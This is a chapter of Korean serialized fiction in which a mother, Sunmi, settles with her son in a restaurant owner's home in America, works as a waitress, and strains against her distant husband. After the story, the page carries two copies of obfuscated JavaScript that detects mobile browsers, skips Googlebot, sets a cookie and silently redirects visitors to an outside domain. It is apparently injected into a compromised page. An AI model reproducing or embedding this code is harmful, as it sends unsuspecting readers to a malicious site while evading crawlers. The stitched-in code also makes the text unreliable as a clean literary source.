아픈다리 서로 기대며 (7)

괜히 돕겠다고 나섰다가 묘하게 되어버려서 선미는 다시 카운터 있는 자리로 되돌아와야 했다. 배달 갔던 분들이 돌아오고 나니 40명가량의 손님이 앉아 있지만 기계적으로 식당이 금방 안정을 되찾았다. 비로소 식당 내부가 보이기 시작했다.

 

홀에는 ‘미스정’이라고 불리는 한국아줌마와 식사 뒤처리와 청소, 각종 잡일을 하는 ‘마르코’라는 스무 살쯤 되 보이는 앳된 스패니쉬가 있었다. 주방에는 누가 있는지 그날은 알 수가 없었다. 정신없는 시간이 지나고 나서 내 사정, 정확히 말하면 초등학교 옆에 방하나 구해 줄 수 있겠냐는 것을 부탁했다. 초등학교 다니는 아이가 있었느냐는 듯이 위아래를 다시 보더니 그렇게 어려운 일은 아닌데 미국에서는 그렇게 쉽고 간단하게 되는 일은 아니니 그렇게 급하면 마침 방도 비어있고, 초등학교와 가까우니 자기 집으로 와서 지내다가 차차로 알아보면 안 되겠냐고 하신다.

‘누굴 믿을 사람이 없어서 식당아줌마에게 부탁을 하고, 그 집으로 들어가겠다고 ?’

‘언니는 내 입장에서는 하나도 생각을 안 해, 아니 못하는 거겠지,’

긴 말이 필요하지 않았다. 자기 혼자 죽고 못 살아 한 결혼이다 보니 결혼 생활이라고도 할 수도 없는 명준과의 10여년이었다. 내 속으로 낳은 자식이라도 제대로 가르치고 싶다는 것이 선미에게는 삶의 존재의미라는 걸 누구보다도 잘 아는 언니는 무참히 긁는 말만 골라서 했다. 지난 두어 달 동안 자기 자랑 들어주기도 이제는 지겨웠다.

특별히 늘어난 짐도 없는 가방 두 개 싸들고 다음날 점심이 끝날 무렵에 준호가 학교에 간 사이에 선미는 윤호를 데리고 식당으로 갔다.

 

 

 

아줌마의 차를 타고 식당에서 2마일쯤 떨어진 곳에 있는 아줌마의 집에 들어가니 코카셔스종 어린 강아지 한 마리가 아줌마를 반긴다. 윤호가 깜짝 놀라서 내 뒤로 숨으니 한두 번 컹컹 짖더니 이내 꼬리를 친다.

밤 11시가 넘어서야 아줌마가 식당 문을 닫고 돌아 오셨다. 그 때까지는 아무것도 할 수가 없었다. 주방에 그릇도 없고 찾잔 두 개있는 것 닦아 놓고 거실과 문밖만 왔다 갔다 했다. 윤호는 금새 ‘담비’라는 크지도 작지도 않는 개와 친해져서 사방 마당을 싸돌아 다녔다.

‘집을 알아 볼 테니 우선 내일 아이 학교 등록부터 하자’고 하신다. 식당으로 돌아가신 뒤에도 줄곧 우리들 생각만 하셨던지 아저씨와 집에 들어서자마자 그렇게 말씀하시는 아주머니가 마치 성모님 같으셨다. 상대방의 ‘필요‘를 채워주는 말과 행동, 머릿속이 금방 환해지면서 이 집이 마치 성당 같다는 착각이 들 정도였다.

다음날 아침 주택가에 자리 잡은 가정집보다 약간 크게 지은 교육구청에 가서 이방 저방을 돌아다니면서 등록 절차를 마쳐주시고는 개학통지서를 받고 집으로 돌아왔다.

다시 아주머니가 그들을 집에 내려놓고 식당으로 돌아가시고 나자, 선미는 윤호를 붙들고 방안에서 몇 바퀴를 돌고 뺨을 비비고, 가슴이 아프도록 껴안고 흔들었다.

‘윤호야, 이제 우리 여기에서 너와 나의 꿈을 이루자.’

엄마와 같이 있는 곳이면 그곳이 어디든지 간에 천국일 나이, 엄마가 기뻐하니 덩달아 즐거운 모양이다.

‘엄마, 학교에 가면 미국아이들과  어떻게 말을 해?’

 

선미가 식당일을 시작한지도 벌써 4년이 지났다.

돈도 돈이지만 할 일도 없이 윤호 학교 보내 놓고 우두커니 집안에서 미국TV만 온 종일 보고 기다리는 것도 지겹고, 학기 시작한 지 두 달쯤 지나니 ‘땡스기빙데이’가 다가오면서 식당이 바빠졌다고 하신다. 방값도 싸게 받고 먹는 것까지 거의 주인아주머니 신세를 지다보니 뭔가를 해 드려야겠다는 염치가 발동 안 할 수가 없었다. 마침 미스정마저 결국 보름만 더하고 자리를 옮기겠다는 통보를 해왔다는 말에 나가기로 마음을 먹었다.

멕시코계인 니디아를 그 동안 준비시켰던지 그녀가 영어와 스패인어를 섞어서 알듯 말 듯 한 말로 열심히 선미를 가르쳤다. 홀 서빙을 하는 식당 웨이츄레스가 된 것이다.

친정이나, 남편, 또 언니가 알면 상상도 못할 일이었지만 정작 선미는 오히려 멀쩡했다. 두 달쯤 지났을까, 주인 부부와 24시간 계속 붙어 있다는 게 쉽지 않다는 느낌을 받고는 아주머니 집 부근으로 방을 얻어 따로 나왔다.  영어 때문에, 그리고 식당 서어비스업이 갖는 고충 때문에 많이 힘들었지만 2년이 지나면서부터는 식당의 메인이 되었다. 이때부터 식당의 거의 모든 걸 선미가 도맡다시피 했다.

윤호도 중학교2학년이 되고나니 집안의 크고 작은 일들은 혼자서 다 한다. 심지어 빨래며 청소까지도, 특히 학교에서는 계속 아너그룹을 유지하고 있었다. 고달픈 가운데서도 낙이라면 유일한 낙이 되었다.

생각보다는 적응이 빨랐고 그만큼 한국에 대한 기억도 서서히 엷어지고 한국말도 점점 서툴러지고 있다는 걸 문득문득 느낀다

 

.imagesCAMQJ012

 

‘돌아와라. 제발.’

처음 2년간 명준은 전화로 용기도 주고, 돈도 보내달라는 것에다 좀 더 보태서 보내 주었다.  한식당 일이라는 게 어떤 날에는 밤12시가 넘어서야 끝나니 집에 돌아와 씻고 나면 새벽 두시가 넘는다. 그래서 아침잠이 항상 늦다. 그런데 2년을 넘기자 혼자서 술만 마시면 전화를 한다. 아침잠에 빠져있는 선미를 깨워서 때로는 울다가 전화하고 그 다음날에는 미안하다고 전화한다.

‘기왕 이렇게 된 거 윤호 대학 들어가고 나면 돌아간다고 몇 수십 번을 말해야 알겠어,’

‘윤호아빠, 나도 힘들단 말이야, 근데 조금만 참으면 모든 게 해결되는 데..,…’

‘그 자식이 나와 너를 갈라놓은 악마새끼야 ’  ‘뭐, 뭐라고 !“

항상 마무리를 못하고 그들은 서로의 감정만 건드린 채 통화를 끊었다.

2년 반이 지나가니 돈이 불규칙하게 송금되었다. 석 달째 돈이 안 들어왔으나 왜 그러냐고 물어 볼 엄두도 안 난다. 그간 선미의 친정으로, 베데스다의 언니에게로 술 먹고는 전화로 별별 해괴한 전화들을 했다는 얘기도 들린다.

 

담배 하나를 모두 태우고 난 뒤에 죠바니는 화장실을 가야겠다며 안으로 들어갔다.

식당에 있는 식구들 중 담배를 하는 사람은 죠바니와 선미 둘 뿐이었다. 점심시작 전에 잠깐

한 대 피우고 나서 오후 3시 될 때까지는 바쁘기도 하지만 손님에게 누가 될까 봐 입에 댈 수가 없다. 오후 세시가 넘으면 주방이나 홀도 약간의 시간적인 여유가 있다.

홀에서 마르코는 테이블과 의자 청소를 하고 니디아와 나는 스시방 옆에 있는 방으로 가서 수저세트를 만든다든가 주방일중에서 시금치나 콩나물을 다듬는 일을 도와준다. 락빌파이크 도로가 창 너머로 보이기 때문에 그 방을 주로 이용한다.

식당은 락빌파이크와 철길 사이에 위치해 있어서 스시방에서 담배 피우러 가려면 홀을 거치고 화장실복도를 지나 냉장창고 뒤로 난 쪽문으로 나와야 한다.

처음엔 니디아가 담배 할 타임을 잘 배려해 주곤 했다. 3년이 지나면서 주인아주머니도 점심만 지나면 나가셨다 저녁 때 돌아오기도 하지만 어떤 날은 안 돌아 올 때도 가끔씩 있다.

서로가 재혼이었는데 자녀도 없었다. 개인사에 대해서는 거의 말씀이 없다.

때문에 서너 시간은 선미가 모든 걸 체크해야 했다. 오후 이 시간이 한결 여유로운 시간인 것이다.

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}